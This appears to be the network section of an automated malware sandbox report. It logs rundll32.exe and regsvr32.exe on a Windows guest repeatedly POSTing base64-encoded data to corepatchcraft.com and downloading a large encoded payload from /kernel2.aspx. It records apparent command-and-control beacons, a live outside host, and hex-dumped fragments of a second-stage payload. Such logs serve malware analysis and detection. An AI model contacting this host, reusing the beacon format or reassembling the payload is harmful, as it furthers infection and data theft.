                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:03:01 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        48192.168.2.66442594.159.113.2134432800C:\Windows\SysWOW64\rundll32.exe
                        TimestampBytes transferredDirectionData
                        2025-01-16 05:03:02 UTC250OUTPOST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:03:02 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:03:02 UTC217INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:03:02 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:03:02 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        49192.168.2.66442694.159.113.2134434980C:\Windows\SysWOW64\regsvr32.exe
                        TimestampBytes transferredDirectionData
                        2025-01-16 05:03:03 UTC81OUTGET /kernel2.aspx HTTP/1.1
                        Host: corepatchcraft.com
                        Cache-Control: no-cache
                        2025-01-16 05:03:03 UTC252INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:03:03 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        Last-Modified: Fri, 10 Jan 2025 13:04:21 GMT
                        ETag: "d0d40-62b59bbb4c5fe"
                        Accept-Ranges: bytes
                        Content-Length: 855360
                        Connection: close
                        2025-01-16 05:03:03 UTC7940INData Raw: 41 51 50 36 54 55 74 4f 63 55 78 64 61 6b 31 49 73 59 35 4d 57 64 4a 4e 53 45 35 78 54 46 6c 71 44 55 68 4f 63 55 78 5a 61 6b 31 49 54 6e 46 4d 57 57 70 4e 53 45 35 78 54 46 6c 71 54 55 68 4f 0d 0a 63 55 78 5a 61 6b 31 49 54 6e 46 4d 57 57 70 4e 57 45 39 78 54 46 64 31 39 30 5a 4f 78 55 57 55 53 2f 56 4a 41 72 78 74 44 51 49 6b 4f 32 34 42 50 6a 59 4e 50 79 6b 6a 55 53 38 34 42 43 4d 6e 0d 0a 4f 6c 45 75 50 45 6f 2f 50 53 42 52 4a 54 64 4b 43 51 63 64 55 53 45 32 44 69 68 6d 51 33 78 47 66 57 70 4e 53 45 35 78 54 46 6d 6a 68 65 78 48 2f 4f 57 54 4d 4d 44 68 68 43 76 42 38 4b 41 58 0d 0a 46 70 57 34 46 39 2f 44 68 78 49 51 71 6f 4d 43 52 75 53 43 46 50 70 6b 6c 7a 48 51 34 59 51 72 78 33 47 6a 46 74 44 6e 75 78 59 48 73 59 4d 54 31 64 69 47 41 2b 46 6c 68
                        Data Ascii: AQP6TUtOcUxdak1IsY5MWdJNSE5xTFlqDUhOcUxZak1ITnFMWWpNSE5xTFlqTUhOcUxZak1ITnFMWWpNWE9xTFd190ZOxUWUS/VJArxtDQIkO24BPjYNPykjUS84BCMnOlEuPEo/PSBRJTdKCQcdUSE2DihmQ3xGfWpNSE5xTFmjhexH/OWTMMDhhCvB8KAXFpW4F9/DhxIQqoMCRuSCFPpklzHQ4YQrx3GjFtDnuxYHsYMT1diGA+Flh
                        2025-01-16 05:03:03 UTC16384INData Raw: 7a 35 31 6d 78 67 57 79 6d 61 71 71 61 45 33 44 43 34 33 48 76 44 65 50 54 45 36 39 67 4a 57 6d 67 59 53 43 76 59 43 56 70 6f 47 45 0d 0a 47 2f 71 67 32 6f 5a 6c 77 51 4f 4e 66 35 6e 68 41 4c 54 48 63 4d 55 59 62 73 51 4a 52 76 6f 5a 70 61 30 50 54 45 39 78 54 46 6e 68 43 4c 53 4a 4d 55 52 59 61 6b 31 49 78 54 79 77 6e 6d 73 4a 0d 0a 4c 45 5a 68 78 77 78 6d 78 42 32 6d 2b 67 6c 52 34 77 69 73 78 54 79 77 32 71 74 42 77 51 4f 64 78 77 79 47 78 42 32 32 2b 67 6d 78 34 77 69 6f 78 54 79 6f 30 43 65 52 77 78 75 52 78 31 76 6a 0d 0a 43 4a 44 46 50 4a 44 53 65 38 51 64 75 76 6f 4a 6f 61 31 4e 4c 41 68 35 58 4e 49 6e 74 59 39 50 75 51 70 52 65 73 59 64 74 76 6f 4a 72 65 4d 50 54 4d 30 4d 75 46 6b 66 52 49 38 4c 67 55 78 5a 0d 0a 61 6b 32 6a 52 2f 6f 42 72 57 6b
                        Data Ascii: z51mxgWymaqqaE3DC43HvDePTE69gJWmgYSCvYCVpoGEG/qg2oZlwQONf5nhALTHcMUYbsQJRvoZpa0PTE9xTFnhCLSJMURYak1IxTywnmsJLEZhxwxmxB2m+glR4wisxTyw2qtBwQOdxwyGxB22+gmx4wioxTyo0CeRwxuRx1vjCJDFPJDSe8QduvoJoa1NLAh5XNIntY9PuQpResYdtvoJreMPTM0MuFkfRI8LgUxZak2jR/oBrWk
                        2025-01-16 05:03:03 UTC16384INData Raw: 70 6f 47 45 67 72 30 5a 30 6f 59 6e 74 79 59 52 72 56 35 36 4b 65 6c 4f 63 55 78 5a 0d 0a 4f 69 6e 42 61 33 46 4d 57 57 6f 63 79 36 4a 74 48 77 38 39 78 43 32 2b 2b 41 47 78 34 51 69 67 78 7a 53 51 30 69 65 52 77 51 4f 52 78 77 79 4b 78 6b 72 48 4e 4b 6a 53 4a 30 56 48 38 43 42 42 0d 0a 33 4c 68 43 7a 66 39 78 54 46 6e 68 43 45 44 4e 73 56 77 4a 34 51 43 67 70 6b 69 2f 70 70 58 45 44 61 4c 36 41 62 58 68 47 45 54 48 49 45 6a 53 4c 36 48 44 41 33 6e 47 43 47 62 46 47 45 4c 36 0d 0a 43 62 31 6c 38 77 42 44 39 49 55 74 62 4d 59 64 6f 76 67 5a 76 61 30 49 74 45 35 78 54 46 6e 68 43 4b 51 65 2b 67 46 52 34 56 77 61 78 54 79 6b 73 51 32 79 74 37 48 34 43 59 48 68 43 4b 54 46 0d 0a 50 4a 54 51 59 73 59 64 6f 69 50 48 48 47 4c 47 41 45 59 67 78 78 53 43 70 51 47
                        Data Ascii: poGEgr0Z0oYntyYRrV56KelOcUxZOinBa3FMWWocy6JtHw89xC2++AGx4QigxzSQ0ieRwQORxwyKxkrHNKjSJ0VH8CBB3LhCzf9xTFnhCEDNsVwJ4QCgpki/ppXEDaL6AbXhGETHIEjSL6HDA3nGCGbFGEL6Cb1l8wBD9IUtbMYdovgZva0ItE5xTFnhCKQe+gFR4VwaxTyksQ2yt7H4CYHhCKTFPJTQYsYdoiPHHGLGAEYgxxSCpQG
                        2025-01-16 05:03:03 UTC16384INData Raw: 74 37 46 43 6a 4a 69 4b 54 55 76 4c 0d 0a 76 62 4b 6d 6c 63 54 4e 68 6f 2b 7a 70 75 45 41 75 4d 63 38 2f 4e 4c 2f 68 62 61 78 6a 73 55 4d 78 73 59 4e 51 76 6f 42 53 65 50 49 61 4c 47 4f 73 39 44 6e 61 62 65 78 6a 71 64 4c 34 52 6a 34 0d 0a 7a 5a 74 4e 30 44 2f 39 77 77 76 64 7a 35 6c 72 78 41 33 69 38 6a 48 70 61 6a 74 6f 77 2f 78 73 70 70 57 79 77 63 4f 31 73 71 61 56 78 68 33 69 66 76 70 62 4f 73 62 46 69 6f 2b 7a 70 6f 4b 77 0d 0a 57 30 39 78 70 35 48 68 77 47 69 78 6a 72 50 53 2f 32 6d 33 73 59 37 46 31 44 4b 7a 74 37 48 34 32 51 57 55 73 72 66 46 39 42 53 6e 6c 62 4c 44 77 79 32 79 70 70 58 45 44 55 4c 34 41 55 6d 44 0d 0a 7a 55 70 4f 63 63 30 6b 77 6b 31 4a 54 6e 46 44 33 42 4a 4d 53 45 37 38 32 58 6d 55 73 72 66 48 4a 4f 6a 53 4c 2b 6e 42 79 7a 47
                        Data Ascii: t7FCjJiKTUvLvbKmlcTNho+zpuEAuMc8/NL/hbaxjsUMxsYNQvoBSePIaLGOs9DnabexjqdL4Rj4zZtN0D/9wwvdz5lrxA3i8jHpajtow/xsppWywcO1sqaVxh3ifvpbOsbFio+zpoKwW09xp5HhwGixjrPS/2m3sY7F1DKzt7H42QWUsrfF9BSnlbLDwy2yppXEDUL4AUmDzUpOcc0kwk1JTnFD3BJMSE782XmUsrfHJOjSL+nByzG
                        2025-01-16 05:03:03 UTC16384INData Raw: 31 47 2b 42 6d 4a 34 51 6a 38 78 7a 53 59 30 69 65 5a 77 51 4f 35 78 77 79 36 78 42 32 43 2b 67 6d 56 4f 73 59 46 68 70 6d 77 38 47 70 4e 49 6b 37 38 41 65 6b 37 70 55 6e 45 6a 72 50 61 0d 0a 72 6b 56 48 2b 4b 48 4a 69 78 39 61 49 46 68 4e 54 46 6b 43 6e 51 35 47 59 53 52 42 4e 30 56 59 70 69 46 50 58 32 72 4f 6a 45 4b 32 43 5a 31 71 54 55 68 4f 2f 41 48 74 34 77 43 67 78 53 53 6b 0d 0a 30 6d 6a 45 44 59 37 36 41 62 48 68 47 49 7a 48 59 4d 63 63 71 73 51 4e 38 76 6f 42 35 65 4d 41 38 49 6b 30 73 4b 61 56 73 72 66 44 50 50 79 78 63 70 46 49 54 76 6f 4a 34 65 45 41 76 43 72 34 0d 0a 51 56 6c 71 54 55 6a 46 6c 42 47 61 70 6f 47 45 67 72 32 41 6c 54 2f 47 70 4d 32 64 43 4e 51 76 73 73 45 4c 67 53 5a 59 35 77 43 33 48 35 6d 46 4f 47 68 4e 79 34 70 35 78 52 79
                        Data Ascii: 1G+BmJ4Qj8xzSY0ieZwQO5xwy6xB2C+gmVOsYFhpmw8GpNIk78Aek7pUnEjrParkVH+KHJix9aIFhNTFkCnQ5GYSRBN0VYpiFPX2rOjEK2CZ1qTUhO/AHt4wCgxSSk0mjEDY76AbHhGIzHYMccqsQN8voB5eMA8Ik0sKaVsrfDPPyxcpFITvoJ4eEAvCr4QVlqTUjFlBGapoGEgr2AlT/GpM2dCNQvssELgSZY5wC3H5mFOGhNy4p5xRy
                        2025-01-16 05:03:04 UTC16384INData Raw: 58 46 48 4f 4c 30 54 45 35 78 54 44 4b 37 73 73 4d 4c 2b 55 38 4a 62 73 51 64 79 76 6f 42 33 65 46 63 77 52 76 78 78 78 7a 71 7a 58 42 50 0d 0a 42 45 57 65 4c 35 46 4a 54 6e 46 4d 73 6d 32 4b 44 5a 4a 78 54 46 6c 71 78 77 57 53 2b 51 47 75 5a 66 73 64 75 66 53 65 4c 48 30 6c 51 56 78 78 54 44 47 36 43 30 42 65 47 65 41 36 59 6c 32 67 0d 0a 39 36 56 4a 57 65 6d 4a 52 4d 55 38 73 4e 6f 54 58 55 67 37 5a 69 52 54 65 45 31 49 4a 71 45 4b 55 58 6f 6c 6f 43 31 35 58 4c 48 7a 6d 55 31 4f 38 6f 68 56 34 51 68 41 78 2f 51 77 70 70 57 79 0d 0a 79 36 4a 68 78 35 58 6a 36 44 69 78 6a 72 50 53 2f 7a 47 33 73 59 34 65 73 59 4d 4a 74 37 48 36 43 61 58 68 42 56 69 6d 6e 2f 68 5a 61 73 59 46 73 76 6f 4e 53 65 47 6f 46 59 78 31 54 4a 57 6d 0d 0a 47 4d 4f 69 47 37 4d 78 78
                        Data Ascii: XFHOL0TE5xTDK7ssML+U8JbsQdyvoB3eFcwRvxxxzqzXBPBEWeL5FJTnFMsm2KDZJxTFlqxwWS+QGuZfsdufSeLH0lQVxxTDG6C0BeGeA6Yl2g96VJWemJRMU8sNoTXUg7ZiRTeE1IJqEKUXoloC15XLHzmU1O8ohV4QhAx/QwppWyy6Jhx5Xj6DixjrPS/zG3sY4esYMJt7H6CaXhBVimn/hZasYFsvoNSeGoFYx1TJWmGMOiG7Mxx
                        2025-01-16 05:03:04 UTC16384INData Raw: 41 36 53 59 38 4c 6a 62 4f 6d 6c 62 4c 46 41 37 6d 6b 66 47 46 50 53 45 48 48 43 5a 45 36 0d 0a 77 41 57 65 6d 58 51 63 61 45 33 44 43 33 6d 6c 51 6d 68 4e 53 4d 55 38 76 4e 71 72 53 63 48 44 67 62 4b 6d 6c 66 64 4d 54 6e 46 4d 4d 71 69 79 77 38 4f 42 73 71 61 56 54 67 6c 4b 2b 4d 6d 31 0d 0a 6c 4c 4b 33 78 65 53 67 70 35 57 79 77 30 7a 34 79 62 47 55 73 72 66 46 2f 4b 53 6e 6c 62 4c 49 64 33 41 35 55 4b 30 49 36 45 39 78 54 46 6d 42 53 6f 38 4c 30 55 78 5a 61 6b 33 43 47 39 48 45 0d 0a 44 4c 56 43 2f 67 75 75 79 5a 6b 66 57 69 42 70 59 6b 78 5a 41 70 30 4f 52 6d 45 6b 39 51 6c 46 57 4b 61 65 36 56 78 71 7a 6f 78 43 2b 68 6d 70 36 54 64 6b 54 67 52 46 6e 69 2f 52 53 55 35 78 0d 0a 54 4c 4a 74 69 67 33 53 63 55 78 5a 61 73 63 4e 30 76 6b 4a 68 32 58 37 42
                        Data Ascii: A6SY8LjbOmlbLFA7mkfGFPSEHHCZE6wAWemXQcaE3DC3mlQmhNSMU8vNqrScHDgbKmlfdMTnFMMqiyw8OBsqaVTglK+Mm1lLK3xeSgp5Wyw0z4ybGUsrfF/KSnlbLId3A5UK0I6E9xTFmBSo8L0UxZak3CG9HEDLVC/guuyZkfWiBpYkxZAp0ORmEk9QlFWKae6VxqzoxC+hmp6TdkTgRFni/RSU5xTLJtig3ScUxZascN0vkJh2X7B
                        2025-01-16 05:03:04 UTC16384INData Raw: 4b 33 39 48 42 4d 57 57 72 49 6d 6a 74 71 0d 0a 69 68 79 6f 54 59 38 4c 6a 62 4f 6d 6c 62 4c 46 41 36 32 6b 31 4b 4e 4d 53 4d 51 30 6a 72 41 7a 51 45 68 4f 6d 43 31 64 61 6b 33 44 43 34 48 50 6d 54 49 64 77 77 4e 35 70 4c 6a 41 73 72 66 33 0d 0a 63 45 78 5a 61 73 69 42 4f 32 71 4b 48 4b 74 4e 6a 77 75 4e 73 36 61 56 73 73 55 44 72 61 51 4d 6f 30 78 49 78 44 53 4e 73 45 74 41 53 45 36 59 5a 56 31 71 54 63 4d 62 67 63 66 62 36 6b 31 49 0d 0a 54 76 72 47 33 57 70 4e 53 4d 66 30 4d 4b 53 56 73 73 48 44 38 62 47 6d 6c 63 62 64 4d 6f 79 7a 70 75 48 49 79 4c 4f 4f 73 39 44 2f 4c 62 57 78 6a 73 58 63 44 72 43 33 73 66 7a 42 4f 5a 65 79 0d 0a 74 78 2f 36 41 56 47 43 69 2f 61 78 6a 76 5a 59 61 6b 31 49 79 36 4d 35 51 71 77 49 69 45 36 32 43 61 57 56 73 72 65 78 2f
                        Data Ascii: K39HBMWWrImjtqihyoTY8LjbOmlbLFA62k1KNMSMQ0jrAzQEhOmC1dak3DC4HPmTIdwwN5pLjAsrf3cExZasiBO2qKHKtNjwuNs6aVssUDraQMo0xIxDSNsEtASE6YZV1qTcMbgcfb6k1ITvrG3WpNSMf0MKSVssHD8bGmlcbdMoyzpuHIyLOOs9D/LbWxjsXcDrC3sfzBOZeytx/6AVGCi/axjvZYak1Iy6M5QqwIiE62CaWVsrex/
                        2025-01-16 05:03:04 UTC16384INData Raw: 42 61 72 36 47 62 32 74 54 30 68 4f 63 55 7a 53 4c 36 6d 50 44 6e 56 4d 57 57 70 4e 77 77 4f 56 69 78 68 69 54 55 68 4f 63 59 6f 63 6c 6b 7a 44 47 35 6e 50 6d 33 72 45 48 5a 4c 36 43 59 58 6a 0d 0a 43 49 7a 44 50 4c 34 49 5a 66 73 64 76 79 50 48 46 4b 36 6c 4e 66 47 50 73 39 49 76 6b 59 38 4f 66 55 78 5a 61 6b 32 4f 43 34 31 4f 30 69 65 6c 79 34 39 52 78 52 53 79 78 68 32 57 2b 42 6d 5a 0d 0a 35 77 69 34 48 6e 37 36 46 49 55 63 77 77 4f 78 70 42 62 56 73 37 66 46 4a 4a 53 65 4b 45 46 49 54 6e 46 4d 6e 79 2b 78 53 38 55 30 70 4a 34 71 66 55 68 4f 63 55 7a 53 4a 36 57 4f 44 30 56 4d 0d 0a 30 6a 2b 6c 79 34 78 4a 78 51 79 2b 39 55 78 4f 63 55 77 79 6f 6b 54 44 47 36 57 4c 58 57 42 4e 53 45 35 78 69 68 79 57 53 63 55 4c 66 52 7a 53 4a 35 6d 67 4f 2b 4a 4e 57
                        Data Ascii: Bar6Gb2tT0hOcUzSL6mPDnVMWWpNwwOVixhiTUhOcYoclkzDG5nPm3rEHZL6CYXjCIzDPL4IZfsdvyPHFK6lNfGPs9IvkY8OfUxZak2OC41O0iely49RxRSyxh2W+BmZ5wi4Hn76FIUcwwOxpBbVs7fFJJSeKEFITnFMny+xS8U0pJ4qfUhOcUzSJ6WOD0VM0j+ly4xJxQy+9UxOcUwyokTDG6WLXWBNSE5xihyWScULfRzSJ5mgO+JNW
                        2025-01-16 05:03:04 UTC16384INData Raw: 6d 58 67 62 62 6b 32 50 43 34 32 7a 70 70 57 79 78 51 50 4e 70 43 6b 45 54 45 6a 46 4e 4b 44 61 55 6b 30 39 57 52 6d 6a 66 47 70 4e 49 4a 34 33 0d 0a 52 45 6b 43 34 52 78 47 59 61 54 6f 63 45 68 49 7a 62 56 41 30 6a 2b 68 77 30 7a 37 52 4e 45 6e 70 63 67 7a 6d 55 30 74 59 73 30 31 70 6e 4d 34 63 6f 45 66 77 78 75 64 78 78 78 69 78 67 4a 4b 0d 0a 53 67 52 64 48 30 53 50 43 35 56 4e 57 57 70 4e 6f 30 6d 32 43 62 31 71 54 55 68 4f 2b 78 6d 39 34 68 69 37 78 44 53 2f 73 6a 62 47 44 61 4c 36 41 56 48 68 48 55 42 31 49 45 51 73 59 34 6f 4e 0d 0a 72 6e 42 4d 57 57 71 6d 54 34 6b 30 72 46 6c 71 54 55 6a 45 4e 4b 7a 52 4c 37 2f 43 43 34 4f 6e 61 75 45 41 51 4d 55 67 51 4e 41 2f 6d 63 4d 4c 6e 63 63 52 5a 73 51 46 6c 76 6f 5a 67 56 45 59 0d 0a 6e 44 74 34 69 78 79
                        Data Ascii: mXgbbk2PC42zppWyxQPNpCkETEjFNKDaUk09WRmjfGpNIJ43REkC4RxGYaTocEhIzbVA0j+hw0z7RNEnpcgzmU0tYs01pnM4coEfwxudxxxixgJKSgRdH0SPC5VNWWpNo0m2Cb1qTUhO+xm94hi7xDS/sjbGDaL6AVHhHUB1IEQsY4oNrnBMWWqmT4k0rFlqTUjENKzRL7/CC4OnauEAQMUgQNA/mcMLnccRZsQFlvoZgVEYnDt4ixy


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        50192.168.2.66442794.159.113.2134432800C:\Windows\SysWOW64\rundll32.exe
                        TimestampBytes transferredDirectionData
                        2025-01-16 05:03:03 UTC250OUTPOST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:03:03 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:03:04 UTC217INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:03:03 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:03:04 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        51192.168.2.66442894.159.113.2134432800C:\Windows\SysWOW64\rundll32.exe
                        TimestampBytes transferredDirectionData
                        2025-01-16 05:03:05 UTC250OUTPOST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:03:05 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:03:05 UTC217INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:03:05 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:03:05 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        52192.168.2.66442994.159.113.2134432800C:\Windows\SysWOW64\rundll32.exe
                        TimestampBytes transferredDirectionData
                        2025-01-16 05:03:06 UTC250OUTPOST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:03:06 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:03:06 UTC217INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:03:06 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:03:06 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        53192.168.2.66443094.159.113.2134432800C:\Windows\SysWOW64\rundll32.exe
                        TimestampBytes transferredDirectionData
                        2025-01-16 05:03:07 UTC250OUTPOST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
